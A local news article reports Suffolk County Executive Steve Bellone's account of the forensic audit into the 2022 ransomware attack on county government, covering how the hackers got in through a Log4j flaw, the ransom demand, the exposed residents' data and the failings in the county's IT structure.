Suffolk Hackers Communicated Up To Month After Cyberattack: Bellone

HAUPPAUGE, NY — Suffolk officials closely guarded that they were still receiving communications from the cyber criminals believed to be responsible for the Sept. 8 attack that brought county government to a standstill up to one month after, County Executive Steve Bellone revealed on Wednesday.

In one communication, the "threat actors" claimed to be conducting a cyber security study that found there was a vulnerability that could lead to "the destruction of systems" and "discomfort" for Suffolk residents, he told reporters at a news conference on Hauppauge announcing the completion of the forensic audit into the hacking.

The findings of the audit have been provided to a committee of county legislators who are probing the event, as well as local and federal law enforcement authorities.

Bellone, who refused to pay the hackers' ransom back in the fall, said he was accused by them of being irrational for his actions saying the disruption could be avoided.

He has previously said that he turned them down because he was unsure if the amount would suffice, and questioning what the funds could be used for by the criminal enterprise.

"It's not the first time that I have been accused of acting irrationally by bad actors since becoming bad actors," he said.

One of the highlights of the audit is that it backed up previous advice to limit communications because the hackers were keeping up with media reports and had been scouring them for clues to use as leverage, according to Bellone.

One media report listed the amount that Suffolk had spent since 2019 on cybersecurity as $6.5 million, and it is believed that is how the hackers were able to come up with their $2.5 million ransom, Bellone said.

The audit contained a detailed review, including how the hackers were able to initially gain access to the county clerk's office through a Log4j vulnerability in 2021, and then establish a bitcoin-mining operation, harvest important county credentials, and then swipe an iron key folder with passwords on the clerk's network.

It detailed how they were able to establish a fake account in the name of former IT commissioner Christopher Naples, who was charged in connection with running a Bitcoin operation out of the clerk's office in 2021. It also determined how the hackers were able to use the domain of the clerk's office, which was separate from the county's main server, and then conduct reconnaissance within the county's system, finally migrating there on Aug. 20, 2022.

In that timeframe, there is evidence of a cobalt strike beacon and other malicious tools were found.

On Aug. 31, the hackers were able to set up a "reverse private tunnel connection" between the hackers and the county clerk's office.

In the wake of the attack, Suffolk officials shut down the government's web-based applications.

It was later determined in the fallout that the driver’s license numbers of nearly 500,000 people, who were issued violations in the county's police district, meaning the area patrolled by Suffolk police outside villages, were possibly exposed, as well as the personal information of current and former employees.

In December, Bellone said that his office had been stymied by the county clerk's segregated IT system.

He now says he regrets that he did not make "a stronger push to end the segregated structure" because centralizing the system could have thwarted the attack. A centralized system could have created an environment that made it easier for information sharing, he said.

Several factors could have helped prevent the attack from happening or progressing such as the implementation of VxRail security infrastructure that was first authorized back in 2019, as well as the security operation center, which was launched by the county in February of 2022, according to Bellone.

If the clerk's office had agreed to participate in the security operation center that might have facilitated the kind of information sharing that could have stopped the attack, he said.

The timely creation of a chief security officer position sooner rather than later, despite the pandemic, could also have helped, Bellone said.

"If we had a chief information security officer in place with security authority across the entire network, then that could have changed the outcome here as well," he said.

Former County Clerk Judith Pascale reportedly requested additional security measures, but was denied.

Her IT director, Peter Schlussler, who was placed on paid leave last year, denied doing anything wrong, according to published reports.

He told The Wall Street Journal in an emailed statement that warnings from the Federal Bureau of Investigation about attack indicators were sent to Suffolk but were not acted on, and that his office attempted to buy a firewall from Palo Alto Networks in June, but the request was blocked.

RELATED STORIES:

• Cyber Expert Says Suffolk Hackers Could Have Had Another Entry: Report
• 5 Things To Know About Preliminary Suffolk Cyberattack Probe
• Suffolk Cyberattack Hackers Demanded $2.5M: Bellone
• 'Zombie House' Demos Stalled In Brookhaven Over Cyberattack: Officials
• Suffolk Offers Free Credit Monitoring To People Exposed In Cyberattack